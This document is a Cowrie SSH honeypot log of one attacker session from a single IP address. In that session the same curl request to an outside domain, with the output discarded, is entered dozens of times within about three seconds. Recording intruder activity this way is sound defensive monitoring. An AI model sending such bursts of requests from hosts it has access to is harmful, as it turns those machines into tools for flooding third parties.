{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:59.266958Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:59.310919Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:59.312041Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:59.359904Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:59.360852Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:59.414351Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:59.415362Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:59.452703Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:59.454008Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:59.491254Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:59.492315Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:59.530222Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:59.531264Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:59.568638Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:59.569816Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:59.608451Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:59.609399Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:59.645921Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:59.646896Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:59.683921Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:59.684859Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:59.844888Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:59.846097Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:59.883672Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:59.884649Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:59.932887Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:59.933835Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:59.970723Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:59.971597Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:00.017917Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:00.019072Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:00.078018Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:00.079181Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:00.126351Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:00.127246Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:00.169843Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:00.171451Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:00.210053Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:00.210992Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:00.247776Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:00.248693Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:00.285527Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:00.287219Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:00.324371Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:00.325286Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:00.372188Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:00.373120Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:00.409740Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:00.410893Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:00.447662Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:00.448655Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:00.485541Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:00.486451Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:00.524431Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:00.525379Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:00.567791Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:00.568901Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:00.614943Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:00.615911Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:00.658080Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:00.659147Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:00.700440Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:00.701443Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:00.738929Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:00.740116Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:00.794035Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:00.795102Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:00.836975Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:00.838186Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:00.876238Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:00.877538Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:00.914891Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:00.915808Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:00.955738Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:00.956752Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:01.001585Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:01.003067Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:01.048452Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:01.049336Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:01.086575Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:01.087687Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:01.126803Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:01.127692Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:01.165118Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:01.166136Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:01.213698Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:01.214557Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:01.257497Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:01.258426Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:01.298618Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:01.299606Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:01.337017Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:01.338284Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:01.375415Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:01.376321Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:01.413865Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:01.414778Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:01.452098Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:01.453092Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:01.493149Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:01.494261Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:01.532139Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:01.533227Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:01.571792Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:01.572901Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:01.622996Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:01.623959Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:01.662248Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:01.664139Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:01.701176Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:01.702160Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:01.739484Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:01.740468Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:01.777956Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:01.779323Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:01.816140Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:01.817226Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:02.000952Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:02.002137Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:02.118307Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:02.119650Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:02.239730Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:02.240810Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:02.281223Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:02.282120Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:02.329094Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:02.329993Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:02.367019Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:02.367957Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:02.406695Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
